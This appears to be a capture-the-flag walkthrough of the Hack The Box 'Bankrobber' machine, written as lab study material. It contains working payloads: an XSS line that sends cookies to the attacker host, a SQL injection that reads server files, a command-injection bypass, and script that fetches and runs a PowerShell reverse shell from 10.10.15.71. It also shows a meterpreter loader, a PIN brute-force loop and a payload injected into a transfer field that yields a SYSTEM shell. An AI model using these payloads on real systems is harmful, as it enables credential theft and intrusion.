Quick Summary
→ Insane machine – Bankrobber is a Web Application that vulnerable to XSS, SQL Injection and RCE that I have to exploit to get the Admin credentials by using XSS.
SQL Injection to study how’s the backdoorchecker.php work, do command injection inside the machine from Web Application to get a reverse shell.
Inside the machine’ I did portforwarding to test the E-Coin transfer’ from there I managed to inject RCE and get the root.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ MySQL and SMB open
→ Bruteforce the Web page directories
Post - Exploitation
→ Create account and Login
→ Transfer any amount of e-coin
→ Do client side attack
→ Use XSS to steal admin credentials
→ Login as admin and find some interesting in the page
Exploitation
→ Found an XSS and SQL Injection vulnerabilites in search.php and backdoorchecker.php
→ Upload a webshell to the server and get a reverse shell
Privilege Escalation
→ Use winPE. or Windows privilege escalation with cmd
→ Looking at running process and active connections inside the machine
→ Use obfuscated meterpreter and tunnel the network with Portforwarding
→ Bruteforce the digit code and test the E-coin transfer
→ Found RCE(Remote Code Execution) in E-coin transfer
→ Gain the Administrator shell
Network Scanning
Walkthrough
→ First, I run the Nmap to scan the target and get information about the various services that are running on the target machine. I use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -p- ⇒ Scan all 65535 ports
- -oN ⇒ to save our scan results to a text file
nmap -sV -sC -p- 10.10.10.154 -oN nmap-Bankrobber
|
Nmap results
Which found opened ports 80, 443, 445 and 3306
root in htb/boxes/Bankrobber
❯ nmap -sV -sC -p- nmap-bankrobber -oN 10.10.10.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 03:12 PST
Nmap scan report for 10.10.10.154
Host is up (0.23s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open tcpwrapped
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open tcpwrapped
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open tcpwrapped
3306/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|10|Phone (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 10 1511 - 1607 (85%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Host script results:
|_clock-skew: mean: 1h02m13s, deviation: 0s, median: 1h02m13s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-07T20:15:16
|_ start_date: 2020-03-07T10:51:24
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.81 seconds
root in htb/boxes/Bankrobber took 1m19s
❯
|
Enumeration
I visited the web page in port 80 and it’s present a Bitcoin web page with Login and Register form.
MySQL on port 3306
The MySQL port is open so I try to connect with it but it couldn’t
root in htb/boxes/Bankrobber
❯ mysql -h 10.10.10.154 --port 3306
ERROR 1130 (HY000): Host '10.10.15.71' is not allowed to connect to this MariaDB server
|
SMB on port 445
connecting to SMB is not helpful too.
root in htb/boxes/Bankrobber took 2s
❯ smbmap -H 10.10.10.154 -u bank
[+] Finding open SMB ports....
[!] Authentication error on 10.10.10.154
[!] Authentication error on 10.10.10.154
|
Brutefore Web directories
I also run dirsearch Web path scanner to look if there’s any interesting web directories.
root in dirsearch on master via 🐍 v2.7.17
❯ ./dirsearch.py -u "http://10.10.10.154" -e asd -t 50
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: asd | HTTP method: get | Threads: 50 | Wordlist size: 6109
Error Log: /opt/dirsearch/logs/errors-20-03-06_18-13-45.log
Target: http://10.10.10.154
[18:13:46] Starting:
[18:13:47] 403 - 1KB - /%3f/
[18:13:47] 403 - 1KB - /%20../
[18:13:47] 403 - 1KB - /%ff/
[18:13:49] 403 - 1KB - /.htaccessOLD
[18:13:49] 403 - 1KB - /.ht_wsr.txt
[18:13:49] 403 - 1KB - /.htaccess-marco
[18:13:49] 403 - 1KB - /.htaccess-local
[18:13:49] 403 - 1KB - /.hta
[18:13:49] 403 - 1KB - /.htaccess-dev
[18:13:49] 403 - 1KB - /.htaccess.sample
[18:13:49] 403 - 1KB - /.htaccess.BAK
[18:13:49] 403 - 1KB - /.htaccess_orig
[18:13:49] 403 - 1KB - /.htaccess.bak1
[18:13:49] 403 - 1KB - /.htaccess.txt
[18:13:49] 403 - 1KB - /.htaccess_sc
[18:13:49] 403 - 1KB - /.htaccess.old
[18:13:49] 403 - 1KB - /.htaccess_extra
[18:13:49] 403 - 1KB - /.htaccess.orig
[18:13:49] 403 - 1KB - /.htaccess.save
[18:13:49] 403 - 1KB - /.htaccessOLD2
[18:13:49] 403 - 1KB - /.htaccess~
[18:13:49] 403 - 1KB - /.htaccessBAK
[18:13:49] 403 - 1KB - /.htgroup
[18:13:49] 403 - 1KB - /.htpasswd-old
[18:13:49] 403 - 1KB - /.htpasswd_test
[18:13:49] 403 - 1KB - /.htpasswds
[18:13:49] 403 - 1KB - /.htusers
[18:13:54] 301 - 336B - /Admin -> http://10.10.10.154/Admin/
[18:13:54] 301 - 336B - /admin -> http://10.10.10.154/admin/
[18:13:54] 200 - 40B - /admin%20/
[18:13:54] 301 - 336B - /ADMIN -> http://10.10.10.154/ADMIN/
[18:13:54] 301 - 337B - /admin. -> http://10.10.10.154/admin./
[18:13:55] 403 - 1KB - /admin/.htaccess
[18:13:55] 200 - 40B - /admin/?/login
[18:13:55] 200 - 40B - /admin/
[18:13:55] 200 - 40B - /admin/index.php
[18:14:05] 403 - 1KB - /cgi-bin/
[18:14:10] 301 - 334B - /css -> http://10.10.10.154/css/
[18:14:15] 403 - 1KB - /error/
[18:14:17] 503 - 1KB - /examples/servlets/index.html
[18:14:17] 503 - 1KB - /examples/servlets/servlet/RequestHeaderExample
[18:14:17] 503 - 1KB - /examples/servlets/servlet/CookieExample
[18:14:17] 503 - 1KB - /examples
[18:14:17] 503 - 1KB - /examples/
[18:14:17] 301 - 336B - /fonts -> http://10.10.10.154/fonts/
[18:14:21] 301 - 334B - /img -> http://10.10.10.154/img/
[18:14:22] 200 - 8KB - /index.PHP
[18:14:22] 200 - 8KB - /INDEX.PHP
[18:14:22] 200 - 8KB - /index.php
[18:14:22] 200 - 8KB - /index.php/login/
[18:14:24] 301 - 333B - /js -> http://10.10.10.154/js/
[18:14:26] 302 - 0B - /login.php -> index.php
[18:14:32] 403 - 1KB - /phpmyadmin
[18:14:34] 403 - 1KB - /phpmyadmin/
[18:14:34] 403 - 1KB - /phpmyadmin/scripts/setup.php
[18:14:36] 200 - 0B - /register.php
[18:14:37] 403 - 1KB - /server-info
[18:14:37] 403 - 1KB - /server-status
[18:14:37] 403 - 1KB - /server-status/
[18:14:45] 403 - 1KB - Trace.axd::$DATA
[18:14:45] 301 - 335B - /user -> http://10.10.10.154/user/
[18:14:45] 200 - 39B - /user/
[18:14:46] 403 - 1KB - web.config::$DATA
Task Completed
root in dirsearch on master via 🐍 v2.7.17 took 1m3s
❯
|
things that caught my attention is this web directories
[18:13:55] 200 - 40B - /admin/?/login
[18:13:55] 200 - 40B - /admin/
[18:13:55] 200 - 40B - /admin/index.php
|
Post - Exploitation
Create account and Login
To test’ I created an account and login it too. Next,
I visited the /admin/index.php and says You're not authorized to view this page for me this is really weird, if you have experience in Web development you will notice that there was an misconfigured in this website.
Steal Admin creds via Cookies
Now I need to get the credentials of the admin. I try to look on the page source of the web page to look for hint but I did not see anything.
then I try the e-coin transfer in user page and this alert caught my attention.
It looks like the admin is checking each transfer transaction, so I intercept it with BurpSuite (A Web Penetration Testing tool)
Using this payload from PayloadAllTheThings
# xss
<img src=x onerror=this.src="http://10.10.15.71/?c="%2bdocument.cookie>
|
my user id # here is ID #4, my username and password in on base64 code format.
toId= is the id where I transfer my e-coin. I set first my nc listener on port 80 then I modify the response with my payload and send it.
after 5-10 minutes of waiting, I’ll get a response in my nc listener and it’s the username and password of the admin in base64 code format.
Convert it to plaintext and I got now the admin creds.
username: admin
password: Hopelessromantic
|
Login as Admin
Now that I have the admin credentials, login as admin, and find some interesting capabilities.
and there’s a NOTES.TXT inside of the Admin page.
Looking at the notes.
I don’t know what that means, but there are two things that I’m sure of.
⇒ default Xampp installation folder is in the C:\xampp\htdocs\ where you can run a local web server.
⇒ There’s was a vulnerability in the encode comments. For every IP address.
Next, the two interesting things I found inside the admin page – Search users and Backdoorchecker.
I try to search my ID # in search users (beta) when you say beta it’s not fully functional, there was an existing bugs and errors with that.
Backdoorchecker
⇒ Due to recent hacking attemps on the server, Backdoorcheker features is only accessible from the localhost because it returns the following message when I try any commands:
There’s a possibility that this features is vulnerable to SQLi.
Exploitation
XSS and SQL Injection
I try to intercept the search users function using BurpSuite and try SQL Injection.
term=4 is my user ID # then sending this to repeater, I put this sql syntax to check how’s backdoorchecker.php work.
term=4' union all select 1,LOAD_FILE('C:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3-- -
|
and I got this response.
HTTP/1.1 200 OK
Date: Sun, 08 Mar 2020 20:30:14 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
X-Powered-By: PHP/7.3.4
Content-Length: 1169
Connection: close
Content-Type: text/html; charset=UTF-8
<table width='90%'><tr><th>ID</th><th>User</th></tr>
<tr>
<td>4</td>
<td>medz</td>
</tr>
<tr>
<td>1</td>
<td><?php
include('../link.php');
include('auth.php');
$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){
$good = "dir";
}
if($username == "admin" && $password == "Hopelessromantic"){
if(isset($_POST['cmd'])){
foreach($bad as $char){
if(strpos($_POST['cmd'],$char) !== false){
die("You're not allowed to do that.");
}
}
if(substr($_POST['cmd'], 0,strlen($good)) != $good){
die("It's only allowed to use the $good command");
}
if($_SERVER['REMOTE_ADDR'] == "::1"){
system($_POST['cmd']);
}
else
{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}
}
}
else
{
echo "You are not allowed to use this function!";
}
?>
</td>
</tr>
</table>
|
– sql injection
It returns to send the request from localhost and the first 3 characters must be “dir” and you can use the characters $(" or '&'")
To execute code I use the PhantomJS bot (via XSS) to send a post request to backdoorchecker.php with a code execution bypass inside the parameter.
I ping my Kali linux machine and set tcpdump. I used:
dirasdf || ping 10.10.15.71
|
and my Kali Linux get a response from Bankrobber
root in htb/boxes/Bankrobber
❯ tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
07:25:28.957530 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421326422 ecr 0,nop,wscale 7], length 0
07:25:29.208067 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421326672 ecr 0,nop,wscale 7], length 0
07:25:29.967531 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421327432 ecr 0,nop,wscale 7], length 0
07:25:30.222861 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421327687 ecr 0,nop,wscale 7], length 0
07:25:31.983082 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421329447 ecr 0,nop,wscale 7], length 0
07:25:32.239634 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421329704 ecr 0,nop,wscale 7], length 0
07:25:34.209667 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421331674 ecr 0,nop,wscale 7], length 0
07:25:35.215733 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421332680 ecr 0,nop,wscale 7], length 0
07:25:36.015323 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421333479 ecr 0,nop,wscale 7], length 0
07:25:37.231355 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421334695 ecr 0,nop,wscale 7], length 0
07:25:44.207219 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421341671 ecr 0,nop,wscale 7], length 0
07:26:00.335356 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421357799 ecr 0,nop,wscale 7], length 0
|
Get Reverse Shell
To exploit this vulnerabilities and get a reverse shell. I used Nishang - Offensive PowerShell for red team, penetration testing and offensive security. I use the script, Invoke-PowerShellTcp.ps1 and named it to evil.ps1.
I called it using powershell through an Impacket Samba Server and setup an nc listener to my Kali Linux.
# javascript
<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || copy \\\\10.10.15.71\\test\\dfuck");</script>&amount=<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || copy \\\\10.10.15.71\\test\\dfuck");</script>&comment=<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || powershell -exec bypass -f \\\\10.10.15.71\\test\\evil.ps1");</script>
|
after 5-10 minutes, my impacket-smbserver got a response and get in into the Bankrobber machine.
and finally I have now the user.txt
Privilege Escalation
Recon
Doing some Reconnaissance, I used winPE or Windows privilege escalation with cmd it’s a tool similar to LinEnum.
It can help with automating Penetration Tests. It performs a discovery on the environment it runs in and tries finding weaknesses to allow privilege escalation. Saving time and allowing more effort to be put toward getting root.
Process and Active Connections
running this takes time. after 10-15 minutes I’ve got now the response.
System Info of Bankrobber
I see something’s odd running on port 910
And a suspicious running on the background process named – bankv2.exe is the same PID #1632 in port 910
Customizing custom Meterpreter loader
so I tunnel my local port 910 in my Kali Linux system to the port 910 of the Bankrobber. To do so I created an obfuscated meterpreter.
see this:
https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
run the bash script and check the payload file
****************************************************************
Automatic C source code generator - FOR METASPLOIT
Based on rsmudge metasploit-loader
****************************************************************
Metasploit server IP : 10.10.15.71
Metasploit port number : 9001
Compiling binary ..
In file included from temp.c:4:
/usr/share/mingw-w64/include/winsock2.h:15:2: warning:
^~~~~~~
-rwxr-xr-x 1 root root 292503 Mar 8 09:08 payload.exe
|
I uploaded it to the Bankrobber and execute it, then I setup a meterpreter session:
Metasploit meterpreter
Now that I have the meterpreter session next I did is Port forwarding
root in htb/boxes/Bankrobber
meterpreter > portfwd add -l 910 -p 910 -r 127.0.0.1
[*] Local TCP relay created: :910 <-> 127.0.0.1:910
|
And connect it to the port using nc -vn 127.0.0.1 910 and it works! Next I try to input a digit code – 1234 but it’s not working.
Brute force the digit code
Since I don’t know what is the exact digit code here, I decided to bruteforce it using bash command line even that I have a feeling that I could get blocked by doing this. so
root in htb/boxes/Bankrobber
❯ for i in {0...9}{0...9}{0...9}{0...9}; do echo $i; echo $i | nc -vn 127.0.0.1 910; done
|
After a seconds’ I get now the right digit code – 0021
When I log in with this PIN, I can transfer e-coins and I see that the transfer.exe process inside is executed:
⇒ [$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
Remote Code Execution (RCE)
Now, theres a possible RCE on that process.
I exploited the E-coin transfer by running my payload inside the Bankrobber machine’ and create meterpreter sessions.
Instead of putting amount of E-Coins in e-coin transfer. I executed my payload with this line.
& ..\\..\\..\\..\\..\\..\Users\\C:\Users\Cortin\payload.exe
|
After executed it i got a response from my meterpreter sessions.
Administrator Shell
root in htb/boxes/Bankrobber
meterpreter > shell
Process 584 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rechten voorbehouden.
|
and Finally rooted !
⇒ nt authority\system
Get root.txt
If you liked my writeup please leave a respect on my Profile
Referrences:
Port 910
Port 910
Customize Meterpreter Payload
XSS with Phantom JS